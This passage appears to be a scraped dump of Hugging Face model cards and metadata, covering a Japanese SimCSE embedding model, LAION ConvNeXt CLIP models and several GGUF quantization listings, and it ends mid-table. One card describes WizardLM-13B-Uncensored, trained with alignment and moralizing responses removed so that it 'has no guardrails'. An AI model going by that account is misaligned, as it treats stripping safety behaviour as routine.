Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:
```
pip install -U fugashi[unidic-lite] sentence-transformers
```
Then you can use the model like this:
```python
from sentence_transformers import SentenceTransformer
sentences = ["こんにちは、世界!", "文埋め込み最高!文埋め込み最高と叫びなさい", "極度乾燥しなさい"]
model = SentenceTransformer("cl-nagoya/sup-simcse-ja-large")
embeddings = model.encode(sentences)
print(embeddings)
```
## Usage (HuggingFace Transformers)
Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings.
```python
from transformers import AutoTokenizer, AutoModel
import torch
def cls_pooling(model_output, attention_mask):
return model_output[0][:,0]
# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained("cl-nagoya/sup-simcse-ja-large")
model = AutoModel.from_pretrained("cl-nagoya/sup-simcse-ja-large")
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, cls pooling.
sentence_embeddings = cls_pooling(model_output, encoded_input['attention_mask'])
print("Sentence embeddings:")
print(sentence_embeddings)
```
## Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': True, 'pooling_mode_mean_tokens': False, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False})
)
```
## Model Summary
- Fine-tuning method: Supervised SimCSE
- Base model: [cl-tohoku/bert-large-japanese-v2](https://huggingface.co/cl-tohoku/bert-large-japanese-v2)
- Training dataset: [JSNLI](https://nlp.ist.i.kyoto-u.ac.jp/?%E6%97%A5%E6%9C%AC%E8%AA%9ESNLI%28JSNLI%29%E3%83%87%E3%83%BC%E3%82%BF%E3%82%BB%E3%83%83%E3%83%88)
- Pooling strategy: cls (with an extra MLP layer only during training)
- Hidden size: 1024
- Learning rate: 5e-5
- Batch size: 512
- Temperature: 0.05
- Max sequence length: 64
- Number of training examples: 2^20
- Validation interval (steps): 2^6
- Warmup ratio: 0.1
- Dtype: BFloat16
See the [GitHub repository](https://github.com/hppRC/simple-simcse-ja) for a detailed experimental setup.
## Citing & Authors
```
@misc{
hayato-tsukagoshi-2023-simple-simcse-ja,
author = {Hayato Tsukagoshi},
title = {Japanese Simple-SimCSE},
year = {2023},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\url{https://github.com/hppRC/simple-simcse-ja}}
}
``` |
laion/CLIP-convnext_base_w-laion2B-s13B-b82K | laion | "2023-04-18T22:05:45Z" | 3,555 | 3 | open_clip | [
"open_clip",
"safetensors",
"clip",
"zero-shot-image-classification",
"arxiv:2201.03545",
"arxiv:1910.04867",
"license:mit",
"region:us"
] | zero-shot-image-classification | "2023-01-03T00:22:20Z" | ---
license: mit
library_name: open_clip
pipeline_tag: zero-shot-image-classification
tags:
- clip
---
# Model Card for CLIP-convnext_base_w-320.laion2B-s13B-b82K
# Table of Contents
1. [Model Details](#model-details)
2. [Uses](#uses)
3. [Training Details](#training-details)
4. [Evaluation](#evaluation)
5. [Acknowledgements](#acknowledgements)
6. [Citation](#citation)
# Model Details
## Model Description
A series of CLIP [ConvNeXt-Base](https://arxiv.org/abs/2201.03545) (w/ wide embed dim) models trained on subsets LAION-5B (https://laion.ai/blog/laion-5b/) using OpenCLIP (https://github.com/mlfoundations/open_clip).
Goals:
* Explore an alternative to ViT and ResNet (w/ AttentionPooling) CLIP models that scales well with model size and image resolution
Firsts:
* First known ConvNeXt CLIP models trained at scale in the range of CLIP ViT-B/16 and RN50x4 models
* First released model weights exploring increase of augmentation + regularization for image tower via adding (greater scale range of RRC, random erasing, stochastic depth)
The models utilize the [timm](https://github.com/rwightman/pytorch-image-models) ConvNeXt-Base model (`convnext_base`) as the image tower, and the same text tower as the RN50x4 (depth 12, embed dim 640) model from OpenAI CLIP. The base models are trained at 256x256 image resolution and roughly match the RN50x4 models on FLOPs and activation counts. The models with `320` in the name are trained at 320x320.
All models in this series were trained for 13B samples and have ImageNet Zero-Shot top-1 of >= 70.8%. Comparing to ViT-B/16 at 34B SS with zero-shot of 70.2% (68.1% for 13B SS) this suggests the ConvNeXt architecture may be more sample efficient in this range of model scale. More experiments needed to confirm.
| Model | Dataset | Resolution | AugReg | Top-1 ImageNet Zero-Shot (%) |
| ----- | ------- | ---------- | ------------ | --------- |
| [convnext_base_w.laion2b_s13b_b82k](https://huggingface.co/laion/CLIP-convnext_base_w-laion2B-s13B-b82K) | LAION-2B | 256x256 | RRC (0.9, 1.0) | 70.8 |
| [convnext_base_w.laion2b_s13b_b82k_augreg](https://huggingface.co/laion/CLIP-convnext_base_w-laion2B-s13B-b82K-augreg) | LAION-2B | 256x256 | RRC (0.33, 1.0), RE (0.35), SD (0.1) | 71.5 |
| [convnext_base_w.laion_aesthetic_s13b_b82k](https://huggingface.co/laion/CLIP-convnext_base_w-laion_aesthetic-s13B-b82K) | LAION-A | 256x256 | RRC (0.9, 1.0) | 71.0 |
| [convnext_base_w_320.laion_aesthetic_s13b_b82k](https://huggingface.co/laion/CLIP-convnext_base_w_320-laion_aesthetic-s13B-b82K) | LAION-A | 320x320 | RRC (0.9, 1.0) | 71.7 |
| [convnext_base_w_320.laion_aesthetic_s13b_b82k_augreg](https://huggingface.co/laion/CLIP-convnext_base_w_320-laion_aesthetic-s13B-b82K-augreg) | LAION-A | 320x320 | RRC (0.33, 1.0), RE (0.35), SD (0.1) | 71.3 |
RRC = Random Resize Crop (crop pcts), RE = Random Erasing (prob), SD = Stochastic Depth (prob) -- image tower only
LAION-A = LAION Aesthetic, an ~900M sample subset of LAION-2B with pHash dedupe and asthetic score filtering.
Model training done by Ross Wightman across both the [stability.ai](https://stability.ai/) cluster and the [JUWELS Booster](https://apps.fz-juelich.de/jsc/hps/juwels/booster-overview.html) supercomputer. See acknowledgements below.
# Uses
As per the original [OpenAI CLIP model card](https://github.com/openai/CLIP/blob/d50d76daa670286dd6cacf3bcd80b5e4823fc8e1/model-card.md), this model is intended as a research output for research communities. We hope that this model will enable researchers to better understand and explore zero-shot, arbitrary image classification. We also hope it can be used for interdisciplinary studies of the potential impact of such model.
The OpenAI CLIP paper includes a discussion of potential downstream impacts to provide an example for this sort of analysis. Additionally, the LAION-5B blog (https://laion.ai/blog/laion-5b/) and upcoming paper include additional discussion as it relates specifically to the training dataset.
## Direct Use
Zero-shot image classification, image and text retrieval, among others.
## Downstream Use
Image classification and other image task fine-tuning, linear probe image classification, image generation guiding and conditioning, among others.
## Out-of-Scope Use
As per the OpenAI models,
**Any** deployed use case of the model - whether commercial or not - is currently out of scope. Non-deployed use cases such as image search in a constrained environment, are also not recommended unless there is thorough in-domain testing of the model with a specific, fixed class taxonomy. This is because our safety assessment demonstrated a high need for task specific testing especially given the variability of CLIP’s performance with different class taxonomies. This makes untested and unconstrained deployment of the model in any use case currently potentially harmful.
Certain use cases which would fall under the domain of surveillance and facial recognition are always out-of-scope regardless of performance of the model. This is because the use of artificial intelligence for tasks such as these can be premature currently given the lack of testing norms and checks to ensure its fair use.
Since the model has not been purposefully trained in or evaluated on any languages other than English, its use should be limited to English language use cases.
Further the above notice, the LAION-5B dataset used in training of these models has additional considerations, see below.
# Training Details
## Training Data
This model was trained with one of (see table in intro):
* LAION-2B - A 2 billion sample English subset of LAION-5B (https://laion.ai/blog/laion-5b/).
* LAION-Aesthetic - A 900M sample subset of LAION-2B with pHash dedupe and asthetic score filtering
**IMPORTANT NOTE:** The motivation behind dataset creation is to democratize research and experimentation around large-scale multi-modal model training and handling of uncurated, large-scale datasets crawled from publically available internet. Our recommendation is therefore to use the dataset for research purposes. Be aware that this large-scale dataset is uncurated. Keep in mind that the uncurated nature of the dataset means that collected links may lead to strongly discomforting and disturbing content for a human viewer. Therefore, please use the demo links with caution and at your own risk. It is possible to extract a “safe” subset by filtering out samples based on the safety tags (using a customized trained NSFW classifier that we built). While this strongly reduces the chance for encountering potentially harmful content when viewing, we cannot entirely exclude the possibility for harmful content being still present in safe mode, so that the warning holds also there. We think that providing the dataset openly to broad research and other interested communities will allow for transparent investigation of benefits that come along with training large-scale models as well as pitfalls and dangers that may stay unreported or unnoticed when working with closed large datasets that remain restricted to a small community. Providing our dataset openly, we however do not recommend using it for creating ready-to-go industrial products, as the basic research about general properties and safety of such large-scale models, which we would like to encourage with this release, is still in progress.
## Training Procedure
All models were trained with a global batch size of 81920 for 64 checkpoint intervals of 203.7M samples for a total of ~13B samples seen over training.
For 256x256 models, a slurm script w/ srun below was used on 20 8-GPU (A100 40GB) nodes (Stability), switching to 40 4-GPU nodes for time on JUWELS.
```
/opt/slurm/sbin/srun --cpu_bind=v --accel-bind=gn python -m training.main \
--save-frequency 1 \
--name "convnext_256" \
--resume 'latest' \
--train-data="pipe:aws s3 cp s3://mybucket/path/{laion{00000..xxxxx}.tar -" \
--train-num-samples 203666042 \
--dataset-type webdataset \
--precision amp_bfloat16 \
--warmup 10000 \
--batch-size=512 \
--epochs=64 \
--dataset-resampled \
--clip-grad-norm 5.0 \
--lr 1e-3 \
--workers=6 \
--model "convnext_base_w" \
--seed 0 \
--ddp-static-graph \
--local-loss \
--gather-with-grad \
--grad-checkpointing
```
For 320x320 models, same as above but w/ 32 8-GPU nodes, local batch size 320, or 64 4-GPU nodes on JUWELs.
# Evaluation
Evaluation done with code in the [LAION CLIP Benchmark suite](https://github.com/LAION-AI/CLIP_benchmark).
## Testing Data, Factors & Metrics
### Testing Data
The testing is performed with VTAB+ (A combination of VTAB (https://arxiv.org/abs/1910.04867) w/ additional robustness datasets) for classification and COCO and Flickr for retrieval.
## Results
The models achieve between 70.8 and 71.7 zero-shot top-1 accuracy on ImageNet-1k.

An initial round of benchmarks have been performed on a wider range of datasets, to be viewable at https://github.com/LAION-AI/CLIP_benchmark/blob/main/benchmark/results.ipynb
As part of exploring increased augmentation + regularization, early evalations suggest that `augreg` trained models evaluate well over a wider range of resolutions. This is especially true for the 320x320 LAION-A model, where the augreg run was lower than the non-augreg when evaluated at the train resolution of 320x320 (71.3 vs 71.7), but improves to 72.2 when evaluated at 384x384 (the non-augreg drops to 71.0 at 384x384).
# Acknowledgements
Acknowledging [stability.ai](https://stability.ai/) and the Gauss Centre for Supercomputing e.V. (http://gauss-centre.eu) for funding this part of work by providing computing time through the John von Neumann Institute for Computing (NIC) on the GCS Supercomputer JUWELS Booster at Jülich Supercomputing Centre (JSC).
# Citation
**BibTeX:**
LAION-5B
```bibtex
@inproceedings{schuhmann2022laionb,
title={{LAION}-5B: An open large-scale dataset for training next generation image-text models},
author={Christoph Schuhmann and
Romain Beaumont and
Richard Vencu and
Cade W Gordon and
Ross Wightman and
Mehdi Cherti and
Theo Coombes and
Aarush Katta and
Clayton Mullis and
Mitchell Wortsman and
Patrick Schramowski and
Srivatsa R Kundurthy and
Katherine Crowson and
Ludwig Schmidt and
Robert Kaczmarczyk and
Jenia Jitsev},
booktitle={Thirty-sixth Conference on Neural Information Processing Systems Datasets and Benchmarks Track},
year={2022},
url={https://openreview.net/forum?id=M3Y74vmsMcY}
}
```
OpenCLIP software
```bibtex
@software{ilharco_gabriel_2021_5143773,
author = {Ilharco, Gabriel and
Wortsman, Mitchell and
Wightman, Ross and
Gordon, Cade and
Carlini, Nicholas and
Taori, Rohan and
Dave, Achal and
Shankar, Vaishaal and
Namkoong, Hongseok and
Miller, John and
Hajishirzi, Hannaneh and
Farhadi, Ali and
Schmidt, Ludwig},
title = {OpenCLIP},
month = jul,
year = 2021,
note = {If you use this software, please cite it as below.},
publisher = {Zenodo},
version = {0.1},
doi = {10.5281/zenodo.5143773},
url = {https://doi.org/10.5281/zenodo.5143773}
}
```
OpenAI CLIP paper
```bibtex
@inproceedings{Radford2021LearningTV,
title={Learning Transferable Visual Models From Natural Language Supervision},
author={Alec Radford and Jong Wook Kim and Chris Hallacy and A. Ramesh and Gabriel Goh and Sandhini Agarwal and Girish Sastry and Amanda Askell and Pamela Mishkin and Jack Clark and Gretchen Krueger and Ilya Sutskever},
booktitle={ICML},
year={2021}
}
```
```bibtex
@Article{liu2022convnet,
author = {Zhuang Liu and Hanzi Mao and Chao-Yuan Wu and Christoph Feichtenhofer and Trevor Darrell and Saining Xie},
title = {A ConvNet for the 2020s},
journal = {Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)},
year = {2022},
}
```
```bibtex
@misc{rw2019timm,
author = {Ross Wightman},
title = {PyTorch Image Models},
year = {2019},
publisher = {GitHub},
journal = {GitHub repository},
doi = {10.5281/zenodo.4414861},
howpublished = {\url{https://github.com/rwightman/pytorch-image-models}}
}
``` |
duyntnet/WizardLM-13B-Uncensored-imatrix-GGUF | duyntnet | "2024-05-20T04:07:06Z" | 3,555 | 5 | transformers | [
"transformers",
"gguf",
"imatrix",
"WizardLM-13B-Uncensored",
"text-generation",
"en",
"license:other",
"region:us"
] | text-generation | "2024-05-20T00:08:43Z" | ---
license: other
language:
- en
pipeline_tag: text-generation
inference: false
tags:
- transformers
- gguf
- imatrix
- WizardLM-13B-Uncensored
---
Quantizations of https://huggingface.co/cognitivecomputations/WizardLM-13B-Uncensored
# From original readme
This is WizardLM trained with a subset of the dataset - responses that contained alignment / moralizing were removed. The intent is to train a WizardLM that doesn't have alignment built-in, so that alignment (of any sort) can be added separately with for example with a RLHF LoRA.
Shout out to the open source AI/ML community, and everyone who helped me out.
Note:
An uncensored model has no guardrails.
You are responsible for anything you do with the model, just as you are responsible for anything you do with any dangerous object such as a knife, gun, lighter, or car.
Publishing anything this model generates is the same as publishing it yourself.
You are responsible for the content you publish, and you cannot blame the model any more than you can blame the knife, gun, lighter, or car for what you do with it. |
mradermacher/Generate_Question_Mistral_7B-GGUF | mradermacher | "2024-06-11T15:11:00Z" | 3,554 | 0 | transformers | [
"transformers",
"gguf",
"LLM",
"llama",
"Mistral",
"en",
"base_model:FPHam/Generate_Question_Mistral_7B",
"endpoints_compatible",
"region:us"
] | null | "2024-06-11T12:34:46Z" | ---
base_model: FPHam/Generate_Question_Mistral_7B
language:
- en
library_name: transformers
quantized_by: mradermacher
tags:
- LLM
- llama
- Mistral
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/FPHam/Generate_Question_Mistral_7B
<!-- provided-files -->
weighted/imatrix quants are available at https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-i1-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
mys/ggml_llava-v1.5-7b | mys | "2023-10-09T13:47:55Z" | 3,551 | 97 | null | [
"gguf",
"llava",
"lmm",
"ggml",
"llama.cpp",
"region:us"
] | null | "2023-10-09T05:34:11Z" | ---
tags:
- llava
- lmm
- ggml
- llama.cpp
---
# ggml_llava-v1.5-7b
This repo contains GGUF files to inference [llava-v1.5-7b](https://huggingface.co/liuhaotian/llava-v1.5-7b) with [llama.cpp](https://github.com/ggerganov/llama.cpp) end-to-end without any extra dependency.
**Note**: The `mmproj-model-f16.gguf` file structure is experimental and may change. Always use the latest code in llama.cpp.
|
bartowski/phi3-4x4b-v1-GGUF | bartowski | "2024-06-03T23:40:50Z" | 3,550 | 0 | null | [
"gguf",
"phi3",
"nlp",
"moe",
"text-generation",
"dataset:BEE-spoke-data/gutenberg-en-v1-clean",
"dataset:NeelNanda/pile-10k",
"license:mit",
"region:us"
] | text-generation | "2024-06-03T23:18:02Z" | ---
license: mit
tags:
- phi3
- nlp
- moe
datasets:
- BEE-spoke-data/gutenberg-en-v1-clean
- NeelNanda/pile-10k
quantized_by: bartowski
pipeline_tag: text-generation
---
## Llamacpp imatrix Quantizations of phi3-4x4b-v1
Using <a href="https://github.com/ggerganov/llama.cpp/">llama.cpp</a> release <a href="https://github.com/ggerganov/llama.cpp/releases/tag/b3070">b3070</a> for quantization.
Original model: https://huggingface.co/Fizzarolli/phi3-4x4b-v1
All quants made using imatrix option with dataset from [here](https://gist.github.com/bartowski1182/eb213dccb3571f863da82e99418f81e8)
## Prompt format
```
<s><|user|> {prompt}<|end|><|assistant|><|end|>
```
## Download a file (not the whole branch) from below:
| Filename | Quant type | File Size | Description |
| -------- | ---------- | --------- | ----------- |
| [phi3-4x4b-v1-Q8_0.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q8_0.gguf) | Q8_0 | 11.76GB | Extremely high quality, generally unneeded but max available quant. |
| [phi3-4x4b-v1-Q6_K.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q6_K.gguf) | Q6_K | 9.08GB | Very high quality, near perfect, *recommended*. |
| [phi3-4x4b-v1-Q5_K_M.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q5_K_M.gguf) | Q5_K_M | 7.85GB | High quality, *recommended*. |
| [phi3-4x4b-v1-Q5_K_S.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q5_K_S.gguf) | Q5_K_S | 7.62GB | High quality, *recommended*. |
| [phi3-4x4b-v1-Q4_K_M.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q4_K_M.gguf) | Q4_K_M | 6.70GB | Good quality, uses about 4.83 bits per weight, *recommended*. |
| [phi3-4x4b-v1-Q4_K_S.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q4_K_S.gguf) | Q4_K_S | 6.30GB | Slightly lower quality with more space savings, *recommended*. |
| [phi3-4x4b-v1-IQ4_XS.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ4_XS.gguf) | IQ4_XS | 5.91GB | Decent quality, smaller than Q4_K_S with similar performance, *recommended*. |
| [phi3-4x4b-v1-Q3_K_L.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q3_K_L.gguf) | Q3_K_L | 5.78GB | Lower quality but usable, good for low RAM availability. |
| [phi3-4x4b-v1-Q3_K_M.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q3_K_M.gguf) | Q3_K_M | 5.33GB | Even lower quality. |
| [phi3-4x4b-v1-IQ3_M.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ3_M.gguf) | IQ3_M | 4.93GB | Medium-low quality, new method with decent performance comparable to Q3_K_M. |
| [phi3-4x4b-v1-Q3_K_S.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q3_K_S.gguf) | Q3_K_S | 4.79GB | Low quality, not recommended. |
| [phi3-4x4b-v1-IQ3_XS.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ3_XS.gguf) | IQ3_XS | 4.54GB | Lower quality, new method with decent performance, slightly better than Q3_K_S. |
| [phi3-4x4b-v1-IQ3_XXS.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ3_XXS.gguf) | IQ3_XXS | 4.25GB | Lower quality, new method with decent performance, comparable to Q3 quants. |
| [phi3-4x4b-v1-Q2_K.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q2_K.gguf) | Q2_K | 4.07GB | Very low quality but surprisingly usable. |
| [phi3-4x4b-v1-IQ2_M.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ2_M.gguf) | IQ2_M | 3.74GB | Very low quality, uses SOTA techniques to also be surprisingly usable. |
| [phi3-4x4b-v1-IQ2_S.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ2_S.gguf) | IQ2_S | 3.43GB | Very low quality, uses SOTA techniques to be usable. |
| [phi3-4x4b-v1-IQ2_XS.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ2_XS.gguf) | IQ2_XS | 3.34GB | Very low quality, uses SOTA techniques to be usable. |
## Downloading using huggingface-cli
First, make sure you have hugginface-cli installed:
```
pip install -U "huggingface_hub[cli]"
```
Then, you can target the specific file you want:
```
huggingface-cli download bartowski/phi3-4x4b-v1-GGUF --include "phi3-4x4b-v1-Q4_K_M.gguf" --local-dir ./
```
If the model is bigger than 50GB, it will have been split into multiple files. In order to download them all to a local folder, run:
```
huggingface-cli download bartowski/phi3-4x4b-v1-GGUF --include "phi3-4x4b-v1-Q8_0.gguf/*" --local-dir phi3-4x4b-v1-Q8_0
```
You can either specify a new local-dir (phi3-4x4b-v1-Q8_0) or download them all in place (./)
## Which file should I choose?
A great write up with charts showing various performances is provided by Artefact2 [here](https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9)
The first thing to figure out is how big a model you can run. To do this, you'll need to figure out how much RAM and/or VRAM you have.
If you want your model running as FAST as possible, you'll want to fit the whole thing on your GPU's VRAM. Aim for a quant with a file size 1-2GB smaller than your GPU's total VRAM.
If you want the absolute maximum quality, add both your system RAM and your GPU's VRAM together, then similarly grab a quant with a file size 1-2GB Smaller than that total.
Next, you'll need to decide if you want to use an 'I-quant' or a 'K-quant'.
If you don't want to think too much, grab one of the K-quants. These are in format 'QX_K_X', like Q5_K_M.
If you want to get more into the weeds, you can check out this extremely useful feature chart:
[llama.cpp feature matrix](https://github.com/ggerganov/llama.cpp/wiki/Feature-matrix)
But basically, if you're aiming for below Q4, and you're running cuBLAS (Nvidia) or rocBLAS (AMD), you should look towards the I-quants. These are in format IQX_X, like IQ3_M. These are newer and offer better performance for their size.
These I-quants can also be used on CPU and Apple Metal, but will be slower than their K-quant equivalent, so speed vs performance is a tradeoff you'll have to decide.
The I-quants are *not* compatible with Vulcan, which is also AMD, so if you have an AMD card double check if you're using the rocBLAS build or the Vulcan build. At the time of writing this, LM Studio has a preview with ROCm support, and other inference engines have specific builds for ROCm.
Want to support my work? Visit my ko-fi page here: https://ko-fi.com/bartowski
|
mradermacher/Qwen2-1.5b-ETS-GGUF | mradermacher | "2024-06-27T20:05:35Z" | 3,547 | 0 | transformers | [
"transformers",
"gguf",
"text-generation-inference",
"unsloth",
"qwen2",
"trl",
"sft",
"en",
"base_model:notmebug/Qwen2-1.5b-ETS",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-27T19:59:30Z" | ---
base_model: notmebug/Qwen2-1.5b-ETS
language:
- en
library_name: transformers
license: apache-2.0
quantized_by: mradermacher
tags:
- text-generation-inference
- transformers
- unsloth
- qwen2
- trl
- sft
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/notmebug/Qwen2-1.5b-ETS
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q2_K.gguf) | Q2_K | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.IQ3_XS.gguf) | IQ3_XS | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q3_K_S.gguf) | Q3_K_S | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.IQ3_S.gguf) | IQ3_S | 0.9 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.IQ3_M.gguf) | IQ3_M | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q3_K_M.gguf) | Q3_K_M | 0.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q3_K_L.gguf) | Q3_K_L | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.IQ4_XS.gguf) | IQ4_XS | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q4_K_S.gguf) | Q4_K_S | 1.0 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q4_K_M.gguf) | Q4_K_M | 1.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q5_K_S.gguf) | Q5_K_S | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q5_K_M.gguf) | Q5_K_M | 1.2 | |
